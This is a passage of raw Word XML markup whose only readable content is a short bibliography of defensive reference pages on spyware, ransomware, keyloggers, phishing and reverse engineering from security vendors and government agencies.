          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A89EBC8" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="0031366D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3884E31E" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="0031366D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EDA01E3" w14:textId="77777777" w:rsidR="00EA3DC9" w:rsidRDefault="00EA3DC9" w:rsidP="00E733A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B3FEDE7" w14:textId="77777777" w:rsidR="00EA3DC9" w:rsidRDefault="00EA3DC9" w:rsidP="00E733A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5397D910" w14:textId="77777777" w:rsidR="00EA3DC9" w:rsidRDefault="00EA3DC9" w:rsidP="00E733A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AFBD3DC" w14:textId="77777777" w:rsidR="00EA3DC9" w:rsidRDefault="00EA3DC9" w:rsidP="00E733A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CE392DE" w14:textId="036F2C1C" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00EA3DC9" w:rsidP="00E733A8">
      <w:pP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lastRenderedPageBreak/>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00E733A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ibliography</w:t>
      </w:r>
      <w:r w:rsidR="00E733A8" w:rsidRPr="00E733A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12871830" w14:textId="0082A871" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="007D23B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Spyware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B7B2A4" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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"Spyware: Everything You Need to Know" by Malwarebytes: [</w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00E733A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>https://www.malwarebytes.com/sp</w:t>
        </w:r>
        <w:r w:rsidRPr="00E733A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>y</w:t>
        </w:r>
        <w:r w:rsidRPr="00E733A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>ware/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E733A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194D34AE" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Ransomware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E20541" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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"Ransomware Attacks: Prevention, Analysis, and Mitigation" by US-CERT: [</w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00E733A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>https://www.us-cert.gov/R</w:t>
        </w:r>
        <w:r w:rsidRPr="00E733A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>a</w:t>
        </w:r>
        <w:r w:rsidRPr="00E733A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>nsomware</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E733A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F06AEC" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Trojan Keylogger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5242D78B" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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"Understanding Trojan Horses, Keyloggers, and Backdoors" by Kaspersky: [</w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00E733A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>https://www.kaspersky.com/r</w:t>
        </w:r>
        <w:r w:rsidRPr="00E733A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>e</w:t>
        </w:r>
        <w:r w:rsidRPr="00E733A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>source-center/threats/trojans</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E733A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EF1C6D" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Phishing Emails:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00226E79" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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"What is Phishing?" by Federal Trade Commission: [</w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00E733A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>https://ww</w:t>
        </w:r>
        <w:r w:rsidRPr="00E733A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>w</w:t>
        </w:r>
        <w:r w:rsidRPr="00E733A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>.consumer.ftc.gov/articles/how-recognize-and-avoid-phishing-scams</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E733A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F4C883" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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"Phishing Attacks and How to Protect Yourself" by Cisco: [</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00E733A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>https://www.cis</w:t>
        </w:r>
        <w:r w:rsidRPr="00E733A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>c</w:t>
        </w:r>
        <w:r w:rsidRPr="00E733A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>o.com/c/en/us/products/security/email-security/what-is-phishing.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E733A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BD180B" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Reverse Engineering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE89C08" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E733A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>"A Brief Introduction to Reverse Engineering" by Georgia Tech College of Computing: [</w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00E733A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>https://w</w:t>
        </w:r>
        <w:r w:rsidRPr="00E733A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>w</w:t>
        </w:r>
        <w:r w:rsidRPr="00E733A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>w.cc.gatech.edu/~bader/COURSES/GATECH/CS4210-Spring-2011/Reversing-CREU.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E733A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104EEB81" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="002C7722" w:rsidRDefault="00E733A8" w:rsidP="0031366D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00E733A8" w:rsidRPr="002C7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25F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5DF6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51741"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BEF2CF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C03DE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1FDEE2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7539D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C0AEC56"/>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76EF7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="746010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5999"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="059CA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203F7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A326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31CFE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D650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C6F0C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C392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443D7E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80F4A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30922"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3CDC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E270C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="76204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C1EDA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="81C61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A49CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9E84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320A9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D064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F4753"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E242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0E742C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="120A6C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26224"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8550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8A1EA2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EAC88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755930"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87B21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EE4F03"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F5288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C51638"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0E7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673CE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1062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D79FF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E664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A6693"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ADDE8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D07F4A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="100E5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702E2C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="16901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915931"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D1BE0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56292"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="91480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406B1A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2912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4846DD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BA3A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008055">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="36010501">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1606307451">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="84377347">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1092967612">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1711417516">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2021421369">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1899512334">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1348172114">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="320430294">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="808018811">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="821654506">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="63770282">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1146779905">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1584290794">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="2037656081">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="445587928">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="99884570">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="2090998559">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1214081734">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1940680222">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1284188067">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1638754081">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="604845159">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1200127635">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="791480737">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1556551180">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1094548076">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="2084403734">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1090855431">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="4751003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06"/>
    <w:rsid w:val="00111982"/>
    <w:rsid w:val="00141754"/>
    <w:rsid w:val="001A57EB"/>
    <w:rsid w:val="001B3812"/>
    <w:rsid w:val="0023789F"/>
    <w:rsid w:val="002B6D4D"/>
    <w:rsid w:val="002C7722"/>
    <w:rsid w:val="0031366D"/>
    <w:rsid w:val="004146E5"/>
    <w:rsid w:val="004D53D6"/>
    <w:rsid w:val="006F74DD"/>
    <w:rsid w:val="00726A06"/>
    <w:rsid w:val="007D23B5"/>
    <w:rsid w:val="007E3ECC"/>
    <w:rsid w:val="007F0ECA"/>
    <w:rsid w:val="008C082C"/>
    <w:rsid w:val="00A02BD7"/>
    <w:rsid w:val="00A47F11"/>
    <w:rsid w:val="00C24704"/>
    <w:rsid w:val="00DA1F4A"/>
    <w:rsid w:val="00DE47E3"/>
    <w:rsid w:val="00E16F5F"/>
    <w:rsid w:val="00E72123"/>
    <w:rsid w:val="00E733A8"/>
    <w:rsid w:val="00EA3DC9"/>
    <w:rsid w:val="00F6137C"/>
    <w:rsid w:val="00F92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A1A9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8DA67460-27F7-4C18-B5B8-2499F6CE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F5F"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A02BD7"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DA1F4A"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E733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690">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="83501542">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="90787158">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="172959779">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="227376627">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="243220372">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
